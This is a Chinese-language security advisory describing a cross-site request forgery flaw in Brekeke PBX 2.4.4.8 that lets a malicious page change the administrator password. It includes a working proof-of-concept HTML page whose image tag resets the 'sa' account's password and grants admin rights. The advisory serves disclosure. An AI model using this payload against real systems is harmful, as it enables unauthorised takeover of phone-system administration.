Brekeke PBX pbx/gate页面跨站请求伪造漏洞

发表评论 (0) 查看评论

受影响系统:

Brekeke Software Brekeke PBX 2.4.4.8

描述:

Brekeke PBX是一款集语音、数据和图像于一体的多媒体业务终端。

Brekeke PBX没有执行有效性检查便允许管理用户通过HTTP请求执行某些操作,用户登录后访问了恶意网页便可能导致非授权修改管理口令。

<*来源:John Leitch
  
  链接:http://secunia.com/advisories/39952/
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html>
<body>

    <img src="http://localhost:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" />

</body>
</html>

建议:

厂商补丁:

Brekeke Software
—————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.brekeke.com/pbx/

发表评论?

0 条评论。

发表评论